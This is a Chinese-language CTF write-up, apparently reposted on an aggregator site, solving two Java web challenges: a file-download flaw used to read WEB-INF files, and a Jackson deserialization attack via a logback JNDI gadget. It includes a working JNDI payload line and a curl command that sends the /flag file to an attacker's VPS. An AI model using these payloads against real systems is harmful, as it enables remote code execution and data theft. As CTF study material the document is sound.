栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb)

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb)


文章目录
  • [RoarCTF 2019]Easy Java
  • [红明谷CTF 2021]JavaWeb

[RoarCTF 2019]Easy Java

存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败

在 burp 中改为 post 传参,可以正常下载文件

只要再去读 class 文件即可

成功下载 class 放到 idea 中,拿到 flag

[红明谷CTF 2021]JavaWeb

题目提示 /login 目录,访问提示 /json

访问 /json 跳回到 /login,并且带了 jsessionid

/login;jsessionid=6B838B383F8E912A5536F55CABDEE4BE

尝试在 cookie 中加上 rememberMe=1

回显的 rememberMe=deleteMe 很明显的 shiro 特征,不会了看其他师傅的 wp

shiro 利用思路

  1. 反序列化
  2. 权限绕过

其他师傅的思路

看了赵今师傅的 wp 用 burp 照着复现竟然失败,是请求中夹杂了其他请求头

于是用 postman 去发包

也就是请求中去到其他的请求头即可,经测试去掉 accept 头后,数据正常

在返回 json 数据中,可以看到 jackson 字样

"exception":"com.fasterxml.jackson.core.JsonParseException",

尝试 jsckson 反序列化

1.首先测试漏洞是否存在

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://ip:port/test"}]

证明此处确实存在漏洞

2.利用 jndi 工具拿到 flag

https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI* -C 'curl http://vps ip:nc port/ -d @/flag'

执行命令工具会开启 ldap 和 rmi 的服务,可以根据 jdk 选择合适的 url,注意防火墙开启对应端口,我这里用 rmi 1099 端口,同时开启 nc 监听对应端口

注意:上图 ip 为 vps 内网 ip,真正要用的是公网 ip 替换一下即可


参考:

[红明谷CTF 2021]JavaWeb

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/859753.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号